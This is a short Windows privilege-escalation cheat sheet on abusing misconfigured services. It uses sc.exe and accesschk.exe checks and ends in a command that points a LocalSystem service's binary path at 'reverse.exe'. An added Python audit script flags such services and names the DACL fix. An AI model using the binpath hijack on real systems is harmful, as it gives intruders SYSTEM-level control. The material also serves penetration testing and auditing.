Basic commands for abusing services to elevate privileges after they have been identified with a tool such as WinPEAS.
```
# Query the configuration of a service
sc.exe qc $service_name
# Query the current status of a service
sc.exe query $service_name
# Modify an option on a service
sc.exe config $service_name $option= $value
# Start and stop a service
net start $service_name
net stop $service_name
```

Use Accesschk.exe to validate service permissions:

```
.\accesschk.exe /accepteula -uwcqv user $service_name
```

- What we are looking for in the output is the `SERVICE_START` and `SERVICE_STOP` permissions.
- We also want to confirm that it is running under a user with higher privileges (e.g., `LocalSystem`).
- Validate whether you can start/stop the service or restart the machine. If you cannot, you may not be able to use it to escalate your privileges.
- Check if we can reboot the system with `whoami /priv`.
- An easy way to escalate privileges utilizing a service is to modify the binary path. The following demonstrates an example of this:

  ```
  sc.exe config $service_name binpath= "\"C:\Windows\Tasks\reverse.exe\""
  ```
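
The same checks run as an audit, as an added example that is not part of the original page: this Python code parses `accesschk.exe` and `sc.exe qc` output for a service and reports when the checked non-admin principal can rewrite the configuration of a service running as `LocalSystem`. The sample output (trimmed), the service name `examplesvc`, and the function names are constructed for illustration; `SERVICE_CHANGE_CONFIG` is the right that `sc.exe config` requires.

```python
import re

# Rights that let a principal rewrite a service's configuration (what `sc.exe config` needs).
WRITE_CONFIG = {"SERVICE_CHANGE_CONFIG", "SERVICE_ALL_ACCESS"}
RESTART = {"SERVICE_START", "SERVICE_STOP"}
ELEVATED = {"localsystem", "nt authority\\system"}

def parse_accesschk(text):
    """Map service name -> set of rights from `accesschk.exe -uwcqv` style output."""
    services, current = {}, None
    for line in text.splitlines():
        header = re.match(r"^(?:RW|R|W)\s+(\S+)\s*$", line)
        if header:
            current = services.setdefault(header.group(1), set())
        elif current is not None and re.match(r"^\s+[A-Z_]+\s*$", line):
            current.add(line.strip())
    return services

def parse_qc(text):
    """Map field name -> value from `sc.exe qc` output."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields

def audit(rights, qc):
    """Return findings for one service; an empty list means nothing to remediate."""
    findings = []
    if qc.get("SERVICE_START_NAME", "").lower() not in ELEVATED:
        return findings  # this narrowed example only flags services running as SYSTEM
    if rights & WRITE_CONFIG:
        findings.append("non-admin principal can change the service configuration")
        if "SERVICE_ALL_ACCESS" in rights or RESTART <= rights:
            findings.append("same principal can restart the service")
    return findings

# Constructed, trimmed sample output for a hypothetical service named "examplesvc".
ACCESSCHK_OUT = "RW examplesvc\n\tSERVICE_QUERY_CONFIG\n\tSERVICE_CHANGE_CONFIG\n\tSERVICE_START\n\tSERVICE_STOP\n"
QC_OUT = """[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: examplesvc
        BINARY_PATH_NAME   : "C:\\Program Files\\Example\\svc.exe"
        SERVICE_START_NAME : LocalSystem
"""

if __name__ == "__main__":
    for name, rights in parse_accesschk(ACCESSCHK_OUT).items():
        print(name, audit(rights, parse_qc(QC_OUT)))
```

A service that produces findings is remediated by tightening its DACL so that only administrators hold `SERVICE_CHANGE_CONFIG`.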